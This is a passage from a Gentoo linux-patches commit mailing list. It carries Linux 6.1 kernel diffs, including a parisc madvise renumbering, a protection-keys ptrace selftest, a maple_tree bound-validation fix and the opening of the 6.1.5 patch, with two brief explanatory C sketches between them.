+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+ 	SND_PCI_QUIRK(0x1043, 0x106d, "Asus K53BE", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+diff --git a/tools/arch/parisc/include/uapi/asm/mman.h b/tools/arch/parisc/include/uapi/asm/mman.h
+index 506c06a6536fb..4cc88a642e106 100644
+--- a/tools/arch/parisc/include/uapi/asm/mman.h
++++ b/tools/arch/parisc/include/uapi/asm/mman.h
+@@ -1,20 +1,20 @@
+ /* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+ #ifndef TOOLS_ARCH_PARISC_UAPI_ASM_MMAN_FIX_H
+ #define TOOLS_ARCH_PARISC_UAPI_ASM_MMAN_FIX_H
+-#define MADV_DODUMP	70
++#define MADV_DODUMP	17
+ #define MADV_DOFORK	11
+-#define MADV_DONTDUMP   69
++#define MADV_DONTDUMP   16
+ #define MADV_DONTFORK	10
+ #define MADV_DONTNEED   4
+ #define MADV_FREE	8
+-#define MADV_HUGEPAGE	67
+-#define MADV_MERGEABLE   65
+-#define MADV_NOHUGEPAGE	68
++#define MADV_HUGEPAGE	14
++#define MADV_MERGEABLE  12
++#define MADV_NOHUGEPAGE 15
+ #define MADV_NORMAL     0
+ #define MADV_RANDOM     1
+ #define MADV_REMOVE	9
+ #define MADV_SEQUENTIAL 2
+-#define MADV_UNMERGEABLE 66
++#define MADV_UNMERGEABLE 13
+ #define MADV_WILLNEED   3
+ #define MAP_ANONYMOUS	0x10
+ #define MAP_DENYWRITE	0x0800
+diff --git a/tools/perf/bench/bench.h b/tools/perf/bench/bench.h
+index 6cefb4315d75e..a5d49b3b6a098 100644
+--- a/tools/perf/bench/bench.h
++++ b/tools/perf/bench/bench.h
+@@ -10,25 +10,13 @@ extern struct timeval bench__start, bench__end, bench__runtime;
+  * The madvise transparent hugepage constants were added in glibc
+  * 2.13. For compatibility with older versions of glibc, define these
+  * tokens if they are not already defined.
+- *
+- * PA-RISC uses different madvise values from other architectures and
+- * needs to be special-cased.
+  */
+-#ifdef __hppa__
+-# ifndef MADV_HUGEPAGE
+-#  define MADV_HUGEPAGE		67
+-# endif
+-# ifndef MADV_NOHUGEPAGE
+-#  define MADV_NOHUGEPAGE	68
+-# endif
+-#else
+ # ifndef MADV_HUGEPAGE
+ #  define MADV_HUGEPAGE		14
+ # endif
+ # ifndef MADV_NOHUGEPAGE
+ #  define MADV_NOHUGEPAGE	15
+ # endif
+-#endif
+ 
+ int bench_numa(int argc, const char **argv);
+ int bench_sched_messaging(int argc, const char **argv);
+diff --git a/tools/testing/selftests/vm/pkey-x86.h b/tools/testing/selftests/vm/pkey-x86.h
+index b078ce9c6d2a7..72c14cd3ddc74 100644
+--- a/tools/testing/selftests/vm/pkey-x86.h
++++ b/tools/testing/selftests/vm/pkey-x86.h
+@@ -104,6 +104,18 @@ static inline int cpu_has_pkeys(void)
+ 	return 1;
+ }
+ 
++static inline int cpu_max_xsave_size(void)
++{
++	unsigned long XSTATE_CPUID = 0xd;
++	unsigned int eax;
++	unsigned int ebx;
++	unsigned int ecx;
++	unsigned int edx;
++
++	__cpuid_count(XSTATE_CPUID, 0, eax, ebx, ecx, edx);
++	return ecx;
++}
++
+ static inline u32 pkey_bit_position(int pkey)
+ {
+ 	return pkey * PKEY_BITS_PER_PKEY;
+diff --git a/tools/testing/selftests/vm/protection_keys.c b/tools/testing/selftests/vm/protection_keys.c
+index 291bc1e07842d..95f403a0c46df 100644
+--- a/tools/testing/selftests/vm/protection_keys.c
++++ b/tools/testing/selftests/vm/protection_keys.c
+@@ -18,12 +18,13 @@
+  *	do a plain mprotect() to a mprotect_pkey() area and make sure the pkey sticks
+  *
+  * Compile like this:
+- *	gcc      -o protection_keys    -O2 -g -std=gnu99 -pthread -Wall protection_keys.c -lrt -ldl -lm
+- *	gcc -m32 -o protection_keys_32 -O2 -g -std=gnu99 -pthread -Wall protection_keys.c -lrt -ldl -lm
++ *	gcc -mxsave      -o protection_keys    -O2 -g -std=gnu99 -pthread -Wall protection_keys.c -lrt -ldl -lm
++ *	gcc -mxsave -m32 -o protection_keys_32 -O2 -g -std=gnu99 -pthread -Wall protection_keys.c -lrt -ldl -lm
+  */
+ #define _GNU_SOURCE
+ #define __SANE_USERSPACE_TYPES__
+ #include <errno.h>
++#include <linux/elf.h>
+ #include <linux/futex.h>
+ #include <time.h>
+ #include <sys/time.h>
+@@ -1550,6 +1551,129 @@ void test_implicit_mprotect_exec_only_memory(int *ptr, u16 pkey)
+ 	do_not_expect_pkey_fault("plain read on recently PROT_EXEC area");
+ }
+ 
++#if defined(__i386__) || defined(__x86_64__)
++void test_ptrace_modifies_pkru(int *ptr, u16 pkey)
++{
++	u32 new_pkru;
++	pid_t child;
++	int status, ret;
++	int pkey_offset = pkey_reg_xstate_offset();
++	size_t xsave_size = cpu_max_xsave_size();
++	void *xsave;
++	u32 *pkey_register;
++	u64 *xstate_bv;
++	struct iovec iov;
++
++	new_pkru = ~read_pkey_reg();
++	/* Don't make PROT_EXEC mappings inaccessible */
++	new_pkru &= ~3;
++
++	child = fork();
++	pkey_assert(child >= 0);
++	dprintf3("[%d] fork() ret: %d\n", getpid(), child);
++	if (!child) {
++		ptrace(PTRACE_TRACEME, 0, 0, 0);
++		/* Stop and allow the tracer to modify PKRU directly */
++		raise(SIGSTOP);
++
++		/*
++		 * need __read_pkey_reg() version so we do not do shadow_pkey_reg
++		 * checking
++		 */
++		if (__read_pkey_reg() != new_pkru)
++			exit(1);
++
++		/* Stop and allow the tracer to clear XSTATE_BV for PKRU */
++		raise(SIGSTOP);
++
++		if (__read_pkey_reg() != 0)
++			exit(1);
++
++		/* Stop and allow the tracer to examine PKRU */
++		raise(SIGSTOP);
++
++		exit(0);
++	}
++
++	pkey_assert(child == waitpid(child, &status, 0));
++	dprintf3("[%d] waitpid(%d) status: %x\n", getpid(), child, status);
++	pkey_assert(WIFSTOPPED(status) && WSTOPSIG(status) == SIGSTOP);
++
++	xsave = (void *)malloc(xsave_size);
++	pkey_assert(xsave > 0);
++
++	/* Modify the PKRU register directly */
++	iov.iov_base = xsave;
++	iov.iov_len = xsave_size;
++	ret = ptrace(PTRACE_GETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++
++	pkey_register = (u32 *)(xsave + pkey_offset);
++	pkey_assert(*pkey_register == read_pkey_reg());
++
++	*pkey_register = new_pkru;
++
++	ret = ptrace(PTRACE_SETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++
++	/* Test that the modification is visible in ptrace before any execution */
++	memset(xsave, 0xCC, xsave_size);
++	ret = ptrace(PTRACE_GETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++	pkey_assert(*pkey_register == new_pkru);
++
++	/* Execute the tracee */
++	ret = ptrace(PTRACE_CONT, child, 0, 0);
++	pkey_assert(ret == 0);
++
++	/* Test that the tracee saw the PKRU value change */
++	pkey_assert(child == waitpid(child, &status, 0));
++	dprintf3("[%d] waitpid(%d) status: %x\n", getpid(), child, status);
++	pkey_assert(WIFSTOPPED(status) && WSTOPSIG(status) == SIGSTOP);
++
++	/* Test that the modification is visible in ptrace after execution */
++	memset(xsave, 0xCC, xsave_size);
++	ret = ptrace(PTRACE_GETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++	pkey_assert(*pkey_register == new_pkru);
++
++	/* Clear the PKRU bit from XSTATE_BV */
++	xstate_bv = (u64 *)(xsave + 512);
++	*xstate_bv &= ~(1 << 9);
++
++	ret = ptrace(PTRACE_SETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++
++	/* Test that the modification is visible in ptrace before any execution */
++	memset(xsave, 0xCC, xsave_size);
++	ret = ptrace(PTRACE_GETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++	pkey_assert(*pkey_register == 0);
++
++	ret = ptrace(PTRACE_CONT, child, 0, 0);
++	pkey_assert(ret == 0);
++
++	/* Test that the tracee saw the PKRU value go to 0 */
++	pkey_assert(child == waitpid(child, &status, 0));
++	dprintf3("[%d] waitpid(%d) status: %x\n", getpid(), child, status);
++	pkey_assert(WIFSTOPPED(status) && WSTOPSIG(status) == SIGSTOP);
++
++	/* Test that the modification is visible in ptrace after execution */
++	memset(xsave, 0xCC, xsave_size);
++	ret = ptrace(PTRACE_GETREGSET, child, (void *)NT_X86_XSTATE, &iov);
++	pkey_assert(ret == 0);
++	pkey_assert(*pkey_register == 0);
++
++	ret = ptrace(PTRACE_CONT, child, 0, 0);
++	pkey_assert(ret == 0);
++	pkey_assert(child == waitpid(child, &status, 0));
++	dprintf3("[%d] waitpid(%d) status: %x\n", getpid(), child, status);
++	pkey_assert(WIFEXITED(status));
++	pkey_assert(WEXITSTATUS(status) == 0);
++	free(xsave);
++}
++#endif
++
+ void test_mprotect_pkey_on_unsupported_cpu(int *ptr, u16 pkey)
+ {
+ 	int size = PAGE_SIZE;
+@@ -1585,6 +1709,9 @@ void (*pkey_tests[])(int *ptr, u16 pkey) = {
+ 	test_pkey_syscalls_bad_args,
+ 	test_pkey_alloc_exhaust,
+ 	test_pkey_alloc_free_attach_pkey0,
++#if defined(__i386__) || defined(__x86_64__)
++	test_ptrace_modifies_pkru,
++#endif
+ };
+ 
+ void run_tests_once(void)


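The parisc madvise() renumbering above is easy to probe from userspace. A minimal sketch (not part of the patch, error handling trimmed) that asks the running kernel about both numbering schemes; note that EINVAL for the generic value can also simply mean CONFIG_KSM is disabled:

  #include <errno.h>
  #include <stdio.h>
  #include <string.h>
  #include <sys/mman.h>

  int main(void)
  {
  	size_t len = 4096;
  	void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
  		       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  	int err_old, err_new;

  	if (p == MAP_FAILED)
  		return 1;

  	err_old = madvise(p, len, 65) ? errno : 0;	/* legacy hppa MADV_MERGEABLE */
  	err_new = madvise(p, len, 12) ? errno : 0;	/* generic MADV_MERGEABLE */

  	printf("madvise(65): %s\nmadvise(12): %s\n",
  	       err_old ? strerror(err_old) : "ok",
  	       err_new ? strerror(err_new) : "ok");
  	munmap(p, len);
  	return 0;
  }

On a 6.1.6 parisc kernel the compat wrapper accepts both values; everywhere else only the generic one is valid.
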
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-12 15:25 Mike Pagano
From: Mike Pagano @ 2023-01-12 15:25 UTC
  To: gentoo-commits

commit:     cfad7fa18e7a38299e446e09aedf44360ddd829d
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jan 12 15:25:25 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jan 12 15:25:25 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cfad7fa1

maple_tree: fix mas_empty_area_rev() lower bound validation

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ++
 ...ee-fix-mas-empty-area-rev-lower-bound-val.patch | 82 ++++++++++++++++++++++
 2 files changed, 86 insertions(+)

diff --git a/0000_README b/0000_README
index e8c453f1..f47a205a 100644
--- a/0000_README
+++ b/0000_README
@@ -75,6 +75,10 @@ Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 
 
+Patch:  1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
+From:		https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git
+Desc:		maple_tree: fix mas_empty_area_rev() lower bound validation
+
 Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758

diff --git a/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch b/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
new file mode 100644
index 00000000..53075739
--- /dev/null
+++ b/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
@@ -0,0 +1,82 @@
+From ebc4c1bcc2a513bb2292dc73aa247b046bc846ce Mon Sep 17 00:00:00 2001
+From: Liam Howlett <liam.howlett@oracle.com>
+Date: Wed, 11 Jan 2023 20:02:07 +0000
+Subject: maple_tree: fix mas_empty_area_rev() lower bound validation
+
+mas_empty_area_rev() was not correctly validating the start of a gap
+against the lower limit.  This could lead to the range starting lower than
+the requested minimum.
+
+Fix the issue by better validating a gap once one is found.
+
+This commit also adds tests to the maple tree test suite for this issue
+and tests the mas_empty_area() function for similar bound checking.
+
+Link: https://lkml.kernel.org/r/20230111200136.1851322-1-Liam.Howlett@oracle.com
+Link: https://bugzilla.kernel.org/show_bug.cgi?id=216911
+Fixes: 54a611b60590 ("Maple Tree: add new data structure")
+Signed-off-by: Liam R. Howlett <Liam.Howlett@oracle.com>
+Reported-by: <amanieu@gmail.com>
+  Link: https://lore.kernel.org/linux-mm/0b9f5425-08d4-8013-aa4c-e620c3b10bb2@leemhuis.info/
+Tested-by: Holger Hoffstätte <holger@applied-asynchrony.com>
+Cc: <stable@vger.kernel.org>
+Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
+---
+ lib/maple_tree.c | 17 ++++++++---------
+ 1 file changed, 8 insertions(+), 9 deletions(-)
+
+(limited to 'lib/maple_tree.c')
+
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 26e2045d3cda9..b990ccea454ec 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -4887,7 +4887,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 	unsigned long *pivots, *gaps;
+ 	void __rcu **slots;
+ 	unsigned long gap = 0;
+-	unsigned long max, min, index;
++	unsigned long max, min;
+ 	unsigned char offset;
+ 
+ 	if (unlikely(mas_is_err(mas)))
+@@ -4909,8 +4909,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 		min = mas_safe_min(mas, pivots, --offset);
+ 
+ 	max = mas_safe_pivot(mas, pivots, offset, type);
+-	index = mas->index;
+-	while (index <= max) {
++	while (mas->index <= max) {
+ 		gap = 0;
+ 		if (gaps)
+ 			gap = gaps[offset];
+@@ -4941,10 +4940,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 		min = mas_safe_min(mas, pivots, offset);
+ 	}
+ 
+-	if (unlikely(index > max)) {
+-		mas_set_err(mas, -EBUSY);
+-		return false;
+-	}
++	if (unlikely((mas->index > max) || (size - 1 > max - mas->index)))
++		goto no_space;
+ 
+ 	if (unlikely(ma_is_leaf(type))) {
+ 		mas->offset = offset;
+@@ -4961,9 +4958,11 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 	return false;
+ 
+ ascend:
+-	if (mte_is_root(mas->node))
+-		mas_set_err(mas, -EBUSY);
++	if (!mte_is_root(mas->node))
++		return false;
+ 
++no_space:
++	mas_set_err(mas, -EBUSY);
+ 	return false;
+ }
+ 
+-- 
+cgit 
+


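The core of this fix is the strengthened bound check: a candidate gap found while walking backwards is only usable if the requested minimum (mas->index) still lies at or below the gap's upper pivot and the gap can hold size units starting from that index. Stripped of the tree walk, the added condition reduces to this standalone sketch (not the kernel code):

  #include <stdbool.h>
  #include <stdio.h>

  /* Mirrors the patch's
   *   if (unlikely((mas->index > max) || (size - 1 > max - mas->index)))
   *           goto no_space;
   * written as a predicate over plain integers. */
  static bool fits(unsigned long index, unsigned long max,
  		 unsigned long size)
  {
  	return index <= max && size - 1 <= max - index;
  }

  int main(void)
  {
  	/* The range [100, 149] is 50 units wide. */
  	printf("%d\n", fits(100, 149, 50));	/* 1: exactly fits */
  	printf("%d\n", fits(100, 149, 51));	/* 0: one unit short */
  	return 0;
  }
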
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-12 12:16 Mike Pagano
From: Mike Pagano @ 2023-01-12 12:16 UTC
  To: gentoo-commits

commit:     fec0d2b267acd404f0efbd1f358639439a3b24be
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jan 12 12:16:30 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jan 12 12:16:30 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=fec0d2b2

Linux patch 6.1.5

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |    6 +-
 1004_linux-6.1.5.patch | 7331 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7336 insertions(+), 1 deletion(-)

diff --git a/0000_README b/0000_README
index 9fb9179d..e8c453f1 100644
--- a/0000_README
+++ b/0000_README
@@ -55,10 +55,14 @@ Patch:  1002_linux-6.1.3.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.3
 
-Patch:  1003_linux-6.1.3.patch
+Patch:  1003_linux-6.1.4.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.4
 
+Patch:  1004_linux-6.1.5.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.5
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1004_linux-6.1.5.patch b/1004_linux-6.1.5.patch
new file mode 100644
index 00000000..abe4ccbc
--- /dev/null
+++ b/1004_linux-6.1.5.patch
@@ -0,0 +1,7331 @@
+diff --git a/Makefile b/Makefile
+index 56afd1509c74f..ddbd2fc917c59 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 4
++SUBLEVEL = 5
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/include/asm/thread_info.h b/arch/arm/include/asm/thread_info.h
+index aecc403b28804..7f092cb55a417 100644
+--- a/arch/arm/include/asm/thread_info.h
++++ b/arch/arm/include/asm/thread_info.h
+@@ -128,15 +128,16 @@ extern int vfp_restore_user_hwstate(struct user_vfp *,
+ #define TIF_NEED_RESCHED	1	/* rescheduling necessary */
+ #define TIF_NOTIFY_RESUME	2	/* callback before returning to user */
+ #define TIF_UPROBE		3	/* breakpointed or singlestepping */
+-#define TIF_SYSCALL_TRACE	4	/* syscall trace active */
+-#define TIF_SYSCALL_AUDIT	5	/* syscall auditing active */
+-#define TIF_SYSCALL_TRACEPOINT	6	/* syscall tracepoint instrumentation */
+-#define TIF_SECCOMP		7	/* seccomp syscall filtering active */
+-#define TIF_NOTIFY_SIGNAL	8	/* signal notifications exist */
++#define TIF_NOTIFY_SIGNAL	4	/* signal notifications exist */
+ 
+ #define TIF_USING_IWMMXT	17
+ #define TIF_MEMDIE		18	/* is terminating due to OOM killer */
+-#define TIF_RESTORE_SIGMASK	20
++#define TIF_RESTORE_SIGMASK	19
++#define TIF_SYSCALL_TRACE	20	/* syscall trace active */
++#define TIF_SYSCALL_AUDIT	21	/* syscall auditing active */
++#define TIF_SYSCALL_TRACEPOINT	22	/* syscall tracepoint instrumentation */
++#define TIF_SECCOMP		23	/* seccomp syscall filtering active */
++
+ 
+ #define _TIF_SIGPENDING		(1 << TIF_SIGPENDING)
+ #define _TIF_NEED_RESCHED	(1 << TIF_NEED_RESCHED)
+diff --git a/arch/mips/ralink/of.c b/arch/mips/ralink/of.c
+index 01c132bc33d54..4d06de77d92a6 100644
+--- a/arch/mips/ralink/of.c
++++ b/arch/mips/ralink/of.c
+@@ -64,7 +64,7 @@ void __init plat_mem_setup(void)
+ 	dtb = get_fdt();
+ 	__dt_setup_arch(dtb);
+ 
+-	if (!early_init_dt_scan_memory())
++	if (early_init_dt_scan_memory())
+ 		return;
+ 
+ 	if (soc_info.mem_detect)
+diff --git a/arch/riscv/include/asm/uaccess.h b/arch/riscv/include/asm/uaccess.h
+index 855450bed9f52..ec0cab9fbddd0 100644
+--- a/arch/riscv/include/asm/uaccess.h
++++ b/arch/riscv/include/asm/uaccess.h
+@@ -165,7 +165,7 @@ do {								\
+ 	might_fault();						\
+ 	access_ok(__p, sizeof(*__p)) ?		\
+ 		__get_user((x), __p) :				\
+-		((x) = 0, -EFAULT);				\
++		((x) = (__force __typeof__(x))0, -EFAULT);	\
+ })
+ 
+ #define __put_user_asm(insn, x, ptr, err)			\
+diff --git a/arch/riscv/kernel/probes/simulate-insn.h b/arch/riscv/kernel/probes/simulate-insn.h
+index cb6ff7dccb92e..de8474146a9b6 100644
+--- a/arch/riscv/kernel/probes/simulate-insn.h
++++ b/arch/riscv/kernel/probes/simulate-insn.h
+@@ -31,9 +31,9 @@ __RISCV_INSN_FUNCS(fence,	0x7f, 0x0f);
+ 	} while (0)
+ 
+ __RISCV_INSN_FUNCS(c_j,		0xe003, 0xa001);
+-__RISCV_INSN_FUNCS(c_jr,	0xf007, 0x8002);
++__RISCV_INSN_FUNCS(c_jr,	0xf07f, 0x8002);
+ __RISCV_INSN_FUNCS(c_jal,	0xe003, 0x2001);
+-__RISCV_INSN_FUNCS(c_jalr,	0xf007, 0x9002);
++__RISCV_INSN_FUNCS(c_jalr,	0xf07f, 0x9002);
+ __RISCV_INSN_FUNCS(c_beqz,	0xe003, 0xc001);
+ __RISCV_INSN_FUNCS(c_bnez,	0xe003, 0xe001);
+ __RISCV_INSN_FUNCS(c_ebreak,	0xffff, 0x9002);
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 6daf842295489..16d8e43be7758 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -1951,6 +1951,8 @@ static int ib_prctl_set(struct task_struct *task, unsigned long ctrl)
+ 		if (ctrl == PR_SPEC_FORCE_DISABLE)
+ 			task_set_spec_ib_force_disable(task);
+ 		task_update_spec_tif(task);
++		if (task == current)
++			indirect_branch_prediction_barrier();
+ 		break;
+ 	default:
+ 		return -ERANGE;
+diff --git a/arch/x86/kernel/crash.c b/arch/x86/kernel/crash.c
+index 9730c88530fc8..305514431f26e 100644
+--- a/arch/x86/kernel/crash.c
++++ b/arch/x86/kernel/crash.c
+@@ -401,10 +401,8 @@ int crash_load_segments(struct kimage *image)
+ 	kbuf.buf_align = ELF_CORE_HEADER_ALIGN;
+ 	kbuf.mem = KEXEC_BUF_MEM_UNKNOWN;
+ 	ret = kexec_add_buffer(&kbuf);
+-	if (ret) {
+-		vfree((void *)image->elf_headers);
++	if (ret)
+ 		return ret;
+-	}
+ 	image->elf_load_addr = kbuf.mem;
+ 	pr_debug("Loaded ELF headers at 0x%lx bufsz=0x%lx memsz=0x%lx\n",
+ 		 image->elf_load_addr, kbuf.bufsz, kbuf.memsz);
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index ff04e9290715a..f46c87ef951df 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -300,6 +300,16 @@ static struct bio *bio_split_rw(struct bio *bio, struct queue_limits *lim,
+ 	*segs = nsegs;
+ 	return NULL;
+ split:
++	/*
++	 * We can't sanely support splitting for a REQ_NOWAIT bio. End it
++	 * with EAGAIN if splitting is required and return an error pointer.
++	 */
++	if (bio->bi_opf & REQ_NOWAIT) {
++		bio->bi_status = BLK_STS_AGAIN;
++		bio_endio(bio);
++		return ERR_PTR(-EAGAIN);
++	}
++
+ 	*segs = nsegs;
+ 
+ 	/*
+diff --git a/drivers/acpi/acpi_video.c b/drivers/acpi/acpi_video.c
+index 32953646caebf..0c79f463fbfd4 100644
+--- a/drivers/acpi/acpi_video.c
++++ b/drivers/acpi/acpi_video.c
+@@ -70,11 +70,7 @@ module_param(device_id_scheme, bool, 0444);
+ static int only_lcd = -1;
+ module_param(only_lcd, int, 0444);
+ 
+-/*
+- * Display probing is known to take up to 5 seconds, so delay the fallback
+- * backlight registration by 5 seconds + 3 seconds for some extra margin.
+- */
+-static int register_backlight_delay = 8;
++static int register_backlight_delay;
+ module_param(register_backlight_delay, int, 0444);
+ MODULE_PARM_DESC(register_backlight_delay,
+ 	"Delay in seconds before doing fallback (non GPU driver triggered) "
+@@ -2178,6 +2174,17 @@ static bool should_check_lcd_flag(void)
+ 	return false;
+ }
+ 
++/*
++ * At least one graphics driver has reported that no LCD is connected
++ * via the native interface. cancel the registration for fallback acpi_video0.
++ * If another driver still deems this necessary, it can explicitly register it.
++ */
++void acpi_video_report_nolcd(void)
++{
++	cancel_delayed_work(&video_bus_register_backlight_work);
++}
++EXPORT_SYMBOL(acpi_video_report_nolcd);
++
+ int acpi_video_register(void)
+ {
+ 	int ret = 0;
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index e9de9d846b730..17b677b5d3b22 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1992,6 +1992,9 @@ static int ublk_ctrl_uring_cmd(struct io_uring_cmd *cmd,
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	int ret = -EINVAL;
+ 
++	if (issue_flags & IO_URING_F_NONBLOCK)
++		return -EAGAIN;
++
+ 	ublk_ctrl_cmd_dump(cmd);
+ 
+ 	if (!(issue_flags & IO_URING_F_SQE128))
+diff --git a/drivers/block/virtio_blk.c b/drivers/block/virtio_blk.c
+index 19da5defd7348..a7697027ce43b 100644
+--- a/drivers/block/virtio_blk.c
++++ b/drivers/block/virtio_blk.c
+@@ -315,22 +315,35 @@ static void virtio_commit_rqs(struct blk_mq_hw_ctx *hctx)
+ 		virtqueue_notify(vq->vq);
+ }
+ 
++static blk_status_t virtblk_fail_to_queue(struct request *req, int rc)
++{
++	virtblk_cleanup_cmd(req);
++	switch (rc) {
++	case -ENOSPC:
++		return BLK_STS_DEV_RESOURCE;
++	case -ENOMEM:
++		return BLK_STS_RESOURCE;
++	default:
++		return BLK_STS_IOERR;
++	}
++}
++
+ static blk_status_t virtblk_prep_rq(struct blk_mq_hw_ctx *hctx,
+ 					struct virtio_blk *vblk,
+ 					struct request *req,
+ 					struct virtblk_req *vbr)
+ {
+ 	blk_status_t status;
++	int num;
+ 
+ 	status = virtblk_setup_cmd(vblk->vdev, req, vbr);
+ 	if (unlikely(status))
+ 		return status;
+ 
+-	vbr->sg_table.nents = virtblk_map_data(hctx, req, vbr);
+-	if (unlikely(vbr->sg_table.nents < 0)) {
+-		virtblk_cleanup_cmd(req);
+-		return BLK_STS_RESOURCE;
+-	}
++	num = virtblk_map_data(hctx, req, vbr);
++	if (unlikely(num < 0))
++		return virtblk_fail_to_queue(req, -ENOMEM);
++	vbr->sg_table.nents = num;
+ 
+ 	blk_mq_start_request(req);
+ 
+@@ -364,15 +377,7 @@ static blk_status_t virtio_queue_rq(struct blk_mq_hw_ctx *hctx,
+ 			blk_mq_stop_hw_queue(hctx);
+ 		spin_unlock_irqrestore(&vblk->vqs[qid].lock, flags);
+ 		virtblk_unmap_data(req, vbr);
+-		virtblk_cleanup_cmd(req);
+-		switch (err) {
+-		case -ENOSPC:
+-			return BLK_STS_DEV_RESOURCE;
+-		case -ENOMEM:
+-			return BLK_STS_RESOURCE;
+-		default:
+-			return BLK_STS_IOERR;
+-		}
++		return virtblk_fail_to_queue(req, err);
+ 	}
+ 
+ 	if (bd->last && virtqueue_kick_prepare(vblk->vqs[qid].vq))
+diff --git a/drivers/char/tpm/tpm-interface.c b/drivers/char/tpm/tpm-interface.c
+index d69905233aff2..7e513b7718320 100644
+--- a/drivers/char/tpm/tpm-interface.c
++++ b/drivers/char/tpm/tpm-interface.c
+@@ -412,7 +412,9 @@ int tpm_pm_suspend(struct device *dev)
+ 	}
+ 
+ suspended:
+-	return rc;
++	if (rc)
++		dev_err(dev, "Ignoring error %d while suspending\n", rc);
++	return 0;
+ }
+ EXPORT_SYMBOL_GPL(tpm_pm_suspend);
+ 
+diff --git a/drivers/crypto/virtio/virtio_crypto_skcipher_algs.c b/drivers/crypto/virtio/virtio_crypto_skcipher_algs.c
+index e553ccadbcbc8..e5876286828b8 100644
+--- a/drivers/crypto/virtio/virtio_crypto_skcipher_algs.c
++++ b/drivers/crypto/virtio/virtio_crypto_skcipher_algs.c
+@@ -239,7 +239,8 @@ static int virtio_crypto_alg_skcipher_close_session(
+ 		pr_err("virtio_crypto: Close session failed status: %u, session_id: 0x%llx\n",
+ 			ctrl_status->status, destroy_session->session_id);
+ 
+-		return -EINVAL;
++		err = -EINVAL;
++		goto out;
+ 	}
+ 
+ 	err = 0;
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index a46df5d1d0942..f12cc29bd4b84 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -611,7 +611,7 @@ int __init efi_config_parse_tables(const efi_config_table_t *config_tables,
+ 
